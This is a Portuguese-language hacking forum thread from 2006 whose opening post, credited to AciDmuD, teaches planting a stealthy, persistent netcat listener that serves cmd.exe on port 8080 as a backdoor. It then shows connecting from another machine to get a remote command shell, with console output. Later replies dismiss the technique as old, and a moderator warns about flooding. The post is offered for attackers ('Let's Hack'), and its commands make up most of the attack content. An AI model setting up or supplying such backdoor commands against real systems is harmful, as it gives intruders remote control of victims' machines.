Shells remotos via ouvidores Netcat

Started by _Dr4k0_, 27 de July , 2006, 06:17:08 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

_Dr4k0_

Aew galera udigrudi, neste post irei demostrar uma tecnica muito usada pela 31337 ! creio que poucos sabem. espero que seja util. Let's Hack

Outra porta dos fundos facil de estabelecer usa o "canivete suiço do TCP/IP", o netcat. O netcat pode ser configurado de modo a ouvir em uma certa porta e lançar um executavel quando um sistema remoto se conecta àquela porta. Configurando-se um ouvidor netcat de modo a disparar o lançamento de um shell de comando NT, esse shell pode ser empurrado de volta para um sistema remoto. A sintaxe para lançar o netcat em modo de escuta furtivo é mostrada a seguir. -L torna o ouvidor persistente ao longo de multiplas conexoes encerradas, -d executa o netcat em modo furtivo( sem console interativo ) e -e especifica o programa a lançar, neste caso o cmd.exe, o interpretador de comandos do NT. -p especifica a porta a ouvir.

Código:

C:\TEMP\NC11NT>nc -L -d -e cmd.exe -p 8080

Isto retornará um shell de comando remoto a qualquer atacante que se conecte à porta 8080. Na sequencia a seguir, uso o netcat em um sistema remoto para conectar a porta ouvindo à maquina mostrada anterior( endereço ip: 192.168.202.44 ) e receber um shell de comando remoto. Para reduzir a confusao, configurei o prompt de comando do sistema local para "D:\>", sendo que o remoto é "C:\TEMP\NC11NT>".

D:\> nc 192.168.202.44 8080
Microsoft ® Windows NT ™
© Copyright 1985-1996 Microsoft Corp.

C:\TEMP\NC11NT>
C:\TEMP\NC11NT>ipconfig

Windows NT IP Configuration

Ethernet adapter FEM5561

IP Address . . . . . . . . . . . .: 192.168.202.44
Subnet Mask . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . .:

C:\TEMP\NC11NT>exit

D:\>

Como voces podem ver, usuarios remotos agora conseguem executar comandos e lançar arquivos. Eles so sao limitados por sua criatividade com o console do NT.

Abraços !

Créditos :AciDmuD
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

HadeS

Poucos sabem... :O

Desculpa, mas isso é velho e para uma pessoa pensar em ser "Hacker", tem que saber isso.

Desculpa _Dr4k0_, a critica não é a você, mas esses textos do AciDmuD não estão com nada. :(

HadeS

_Dr4k0_

Quote from: "HadeS"Poucos sabem... :O

Desculpa, mas isso é velho e para uma pessoa pensar em ser "Hacker", tem que saber isso.

Desculpa _Dr4k0_, a critica não é a você, mas esses textos do AciDmuD não estão com nada. :(

HadeS

Sim eu entendi eu só estou compartilhando alguns textos
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

HadeS

Sim, eu sei Drako, minha(s) crítica(s) não são a você, e sim a quem escreveu os textos. Eu sei que sua intenção é a melhor, só quer compartilhar.

HadeS

Ðark$pawn

Quote from: "f4kelive"manjado

Acabei de avisar um agora, da próxima, cabeças vão rolar (hehe)!!!

Não quero ser chato, apenas quero o fórum da melhor forma possível e flood é inadmissível! ;)